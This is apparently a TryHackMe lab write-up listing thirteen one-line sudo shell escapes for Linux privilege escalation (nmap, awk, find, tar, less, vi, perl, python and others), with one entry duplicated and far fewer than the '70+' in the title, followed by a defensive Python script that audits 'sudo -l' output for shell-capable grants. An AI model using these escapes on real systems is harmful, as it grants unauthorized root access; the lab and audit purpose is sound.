70+ WAYS TO GET ROOT — LINUX PRIVILEGE ESCALATION
This write-up covers getting a root shell on Linux and is based on the Linux Privesc Playground room on https://tryhackme.com/
Log in to the box using the SSH credentials given (check the room's details on THM).
Here is the list of all the ways I could think of at the time of solving this:
1. nmap --interactive; !sh
2. echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
3. sudo awk 'BEGIN {system("/bin/sh")}'
4. sudo find /home -exec /bin/bash \;
5. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
6. sudo less /etc/hosts then !/bin/bash
7. sudo bash
8. sudo perl -e 'exec "/bin/bash";'
9. sudo python -c 'import pty;pty.spawn("/bin/bash")'
10. sudo man man then !/bin/bash
11. sudo vi then :!/bin/bash
12. sudo vim -c '!sh'
13. sudo env /bin/bash
13. sudo env /bin/bash
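Every entry above works because the sudoers policy grants a program that can start a shell or run another command. The following audit sketch is an added example, not part of the original write-up: it parses `sudo -l` output and reports rules that grant one of the programs listed above. The names `SHELL_CAPABLE`, `RULE`, `risky_sudo_entries` and the sample output are hypothetical and constructed for illustration.

```python
import os
import re

# Programs from the list above that can spawn a shell or run an arbitrary command.
SHELL_CAPABLE = {"nmap", "awk", "find", "tar", "less", "bash", "perl",
                 "python", "man", "vi", "vim", "env"}

# One rule line of `sudo -l`: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def risky_sudo_entries(sudo_l_output):
    """Return (runas, nopasswd, command) for every shell-capable sudo grant."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header, Defaults line, or blank line
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            name = os.path.basename(cmd.split()[0])
            base = re.sub(r"[\d.]+$", "", name)  # python3.8 -> python
            # "ALL" grants every command, so it is always reported.
            if cmd == "ALL" or base in SHELL_CAPABLE:
                findings.append((m.group("runas"), nopasswd, cmd))
    return findings

# Constructed sample of `sudo -l` output (not taken from the room).
SAMPLE = """\
Matching Defaults entries for user on box:
    env_reset, mail_badpass

User user may run the following commands on box:
    (root) NOPASSWD: /usr/bin/find, /usr/bin/python3
    (root) /usr/bin/less /var/log/syslog
    (root) NOPASSWD: /usr/bin/systemctl status nginx
    (ALL : ALL) ALL
"""

if __name__ == "__main__":
    for runas, nopasswd, cmd in risky_sudo_entries(SAMPLE):
        auth = "no password" if nopasswd else "password required"
        print(f"[!] as ({runas}), {auth}: {cmd}")
```

Rules flagged this way are candidates for removal, for the sudoers `NOEXEC` tag, or for replacement with `sudoedit` where the goal is only to edit a file.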